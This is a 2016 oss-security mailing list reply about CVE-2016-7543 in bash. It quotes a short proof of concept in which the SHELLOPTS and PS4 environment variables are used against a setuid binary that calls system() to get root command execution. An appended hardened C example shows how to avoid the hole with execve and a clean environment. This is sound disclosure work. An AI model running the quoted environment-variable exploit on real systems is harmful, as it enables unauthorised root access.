Date: Mon, 26 Sep 2016 16:01:03 -0700
From: Tavis Ormandy <taviso@...xchg8b.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2016-7543 -- bash SHELLOPTS+PS4

up201407890@...nos.dcc.fc.up.pt wrote:

> The recent bash 4.4 patched an old attack vector regarding specially
> crafted SHELLOPTS+PS4 environment variables against bogus setuid binaries
> using system()/popen().
> 
> https://lists.gnu.org/archive/html/bug-bash/2016-09/msg00018.html
> 
> "nn. Shells running as root no longer inherit PS4 from the environment,
> closing a security hole involving PS4 expansion performing command
> substitution."
> 
> # gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }'
> # chmod 4755 ./test
> # ls -l ./test
> -rwsr-xr-x. 1 root root 8549 Sep 10 18:06 ./test
> # exit
> $ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
> uid=0(root)
> Sat Sep 10 18:06:36 WET 2016
> 
> Sorry Tavis :P
> 

Hah, nice work :-)

Tavis.
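
An added example, not part of the original thread: a hardened form of the quoted test program that runs the helper with `execve()` and a fixed environment instead of `system()`, so no shell is started and SHELLOPTS and PS4 from the caller are never inherited. The name `run_clean`, the `CLEAN_ENV` contents and the `/bin/date` path are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment for the child (assumed value). Nothing is copied from
 * the caller, so SHELLOPTS, PS4, IFS, LD_* and the rest never reach it. */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Run an absolute path directly, with no shell in between.
 * Returns the child's exit status, or -1 on error or abnormal exit. */
int run_clean(const char *path, char *const argv[])
{
    int status;
    pid_t pid;

    /* Refuse relative names so that PATH lookup can never pick the binary. */
    if (path == NULL || path[0] != '/')
        return -1;

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* system() would exec "/bin/sh -c ..." with the inherited
         * environment; execve() with CLEAN_ENV avoids both. */
        execve(path, argv, CLEAN_ENV);
        _exit(127);             /* exec failed */
    }
    while (waitpid(pid, &status, 0) < 0) {
        if (errno != EINTR)
            return -1;
    }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Same helper as the quoted test program, minus the shell. */
    char *const argv[] = { "date", NULL };
    return run_clean("/bin/date", argv) == 0 ? 0 : 1;
}
```
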
